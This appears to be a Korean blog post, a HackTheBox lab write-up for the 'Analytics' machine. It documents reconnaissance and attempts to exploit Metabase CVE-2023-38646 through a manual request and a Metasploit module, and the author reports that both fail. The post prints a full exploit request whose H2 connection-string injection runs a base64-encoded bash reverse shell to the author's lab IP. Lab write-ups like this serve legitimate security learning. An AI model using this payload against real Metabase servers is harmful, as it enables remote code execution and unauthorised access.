본문 바로가기

Hacking/HackTheBox

Analytics

[Reconnaissance : 정찰]

 

1. Nmap 수행 
nmap -T4 -A -v --unprivileged analytical.htb (--unpriviledged 옵션 사용)

 

2. 환경 변수에 analytical.htb 및 data.analytical.htb 입력 

 

 

3. metabase 취약점 검색 및 공격 수행

https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/metabase/CVE-2023-38646.yaml

https://github.com/m3m0o/metabase-pre-auth-rce-poc?tab=readme-ov-file

> 취약점명 : CVE-2023-38646

> 취약점설명 : 0.46.6.1 이전 메타베이스 버전에는 설정 프로세스가 완료된 후에도 비밀 설정 토큰에 액세스할 수 있는
결함이 포함.
 공격자가 이 토큰을 사용하여 쎗업펑션을 호출하여 새 데이터베이스를 만들 수 있음.
 새 데이터베이스를 만들 때 H2 데이터베이스 문자열로 커맨드 인젝션 가능.

> 공격 문구
 setup token : 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

 DEVICE=0b17fbc9-e622-4876-97ab-d72306bf209d

 PC IP : 10.10.14.66

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
Content-Type: application/json
Referer: http://data.analytical.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: metabase.DEVICE=0b17fbc9-e622-4876-97ab-d72306bf209d
Connection: close
Content-Length: 822

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjY2LzU1NTUgMD4mMSAg}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

위의 코드 중 리버스 쉘 IP 및  본인 PC IP로 설정

위 방법 시행 시 응답 값 아래와 같으며, 리버스쉘 실행되지 않음

4. metasploit 을 통해 재작업 수행

1) msf6) search metabase

2) msf6) use exploit/linux/http/metabase_setup_token_rce
및 run 수행

=> 리버스 쉘 생성 안됨.

'Hacking > HackTheBox' 카테고리의 다른 글

Giddy  (0) 2024.05.15
escape(windows)  (1) 2024.04.16
support  (0) 2024.04.03
Aero  (1) 2024.02.20
devvortex  (0) 2024.02.01